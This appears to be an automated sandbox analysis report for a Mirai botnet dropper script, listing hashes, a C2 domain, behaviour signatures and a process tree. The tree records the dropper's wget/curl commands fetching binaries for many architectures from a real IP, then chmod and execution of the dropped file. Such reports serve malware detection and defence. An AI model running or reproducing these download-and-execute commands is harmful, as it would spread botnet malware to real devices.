Analysis

  • max time kernel
    115s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    19-12-2024 07:08

General

  • Target

    feelme420.sh

  • Size

    3KB

  • MD5

    22e9d65b991f00de3a52071664dc52f9

  • SHA1

    2b6dd972572c4c72ecf43bb7b66eebe776cd0360

  • SHA256

    7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b

  • SHA512

    eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb

Malware Config

Extracted

Family

mirai

C2

chernobyl.stressing.world

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (12958) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 16 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 16 IoCs
  • Modifies Watchdog functionality 1 TTPs 32 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Enumerates active TCP sockets 1 TTPs 15 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 32 IoCs
  • Reads process memory 1 TTPs 26 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 16 IoCs
  • Reads system network configuration 1 TTPs 15 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 31 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/feelme420.sh
    /tmp/feelme420.sh
    1⤵
    • Writes file to tmp directory
    PID:1507
    • /usr/bin/wget
      wget http://94.23.167.188/F331M3/feelme420.x86
      2⤵
      • Writes file to tmp directory
      PID:1508
    • /usr/bin/curl
      curl -O http://94.23.167.188/F331M3/feelme420.x86
      2⤵
      • Writes file to tmp directory
      PID:1512
    • /bin/cat
      cat feelme420.x86
      2⤵
        PID:1513
      • /bin/chmod
        chmod +x config-err-N4UXNv f331m3420 feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
        2⤵
        • File and Directory Permissions Modification
        PID:1514
      • /tmp/f331m3420
        ./f331m3420 feelme420.exploit
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Changes its process name
        PID:1515
      • /usr/bin/wget
        wget http://94.23.167.188/F331M3/feelme420.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1518
      • /usr/bin/curl
        curl -O http://94.23.167.188/F331M3/feelme420.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1522
      • /bin/chmod
        chmod +x config-err-N4UXNv f331m3420 feelme420.mips feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
        2⤵
        • File and Directory Permissions Modification
        PID:1524
      • /tmp/f331m3420
        ./f331m3420 feelme420.exploit
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        PID:1525
      • /usr/bin/wget
        wget http://94.23.167.188/F331M3/feelme420.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1528
      • /usr/bin/curl
        curl -O http://94.23.167.188/F331M3/feelme420.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1532
      • /bin/chmod
        chmod +x config-err-N4UXNv f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
        2⤵
        • File and Directory Permissions Modification
        PID:1534
      • /tmp/f331m3420
        ./f331m3420 feelme420.exploit
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        PID:1535
      • /usr/bin/wget
        wget http://94.23.167.188/F331M3/feelme420.arm
        2⤵
          PID:1538
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arm
          2⤵
          • Writes file to tmp directory
          PID:1542
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
          2⤵
          • File and Directory Permissions Modification
          PID:1544
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1545
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arm5
          2⤵
          • Writes file to tmp directory
          PID:1548
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arm5
          2⤵
          • Writes file to tmp directory
          PID:1552
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
          2⤵
          • File and Directory Permissions Modification
          PID:1554
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1555
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arm6
          2⤵
          • Writes file to tmp directory
          PID:1558
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arm6
          2⤵
          • Writes file to tmp directory
          PID:1562
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
          2⤵
          • File and Directory Permissions Modification
          PID:1564
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1565
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arm7
          2⤵
          • Writes file to tmp directory
          PID:1568
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arm7
          2⤵
          • Writes file to tmp directory
          PID:1572
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR3
          2⤵
          • File and Directory Permissions Modification
          PID:1574
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1575
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.ppc
          2⤵
          • Writes file to tmp directory
          PID:1580
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.ppc
          2⤵
          • Writes file to tmp directory
          PID:1584
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
          2⤵
          • File and Directory Permissions Modification
          PID:1586
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1587
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.m68k
          2⤵
          • Writes file to tmp directory
          PID:1590
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.m68k
          2⤵
          • Writes file to tmp directory
          PID:1594
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
          2⤵
          • File and Directory Permissions Modification
          PID:1596
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1597
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.sh4
          2⤵
          • Writes file to tmp directory
          PID:1600
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.sh4
          2⤵
          • Writes file to tmp directory
          PID:1604
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
          2⤵
          • File and Directory Permissions Modification
          PID:1606
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1607
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.spc
          2⤵
          • Writes file to tmp directory
          PID:1610
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.spc
          2⤵
          • Writes file to tmp directory
          PID:1614
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
          2⤵
          • File and Directory Permissions Modification
          PID:1616
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1617
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arc
          2⤵
          • Writes file to tmp directory
          PID:1620
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arc
          2⤵
          • Writes file to tmp directory
          PID:1624
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
          2⤵
          • File and Directory Permissions Modification
          PID:1626
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1627
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1630
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1634
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
          2⤵
          • File and Directory Permissions Modification
          PID:1636
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1637
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.i686
          2⤵
          • Writes file to tmp directory
          PID:1640
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.i686
          2⤵
          • Writes file to tmp directory
          PID:1644
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
          2⤵
          • File and Directory Permissions Modification
          PID:1646
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1647
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.i486
          2⤵
          • Writes file to tmp directory
          PID:1650
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.i486
          2⤵
          • Writes file to tmp directory
          PID:1654
        • /bin/chmod
          chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
          2⤵
          • File and Directory Permissions Modification
          PID:1656
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1657
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.i586
          2⤵
            PID:1660
          • /usr/bin/curl
            curl -O http://94.23.167.188/F331M3/feelme420.i586
            2⤵
            • Writes file to tmp directory
            PID:1664
          • /bin/chmod
            chmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9
            2⤵
            • File and Directory Permissions Modification
            PID:1666
          • /tmp/f331m3420
            ./f331m3420 feelme420.exploit
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Reads process memory
            • Changes its process name
            • Reads system network configuration
            PID:1667

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/f331m3420

          Filesize

          68KB

          MD5

          71b0c2e7cc122d6de4a481bea5ebc6d9

          SHA1

          f982ae244188ddd93b797e9548e049b97d2f2c7f

          SHA256

          de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833

          SHA512

          f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43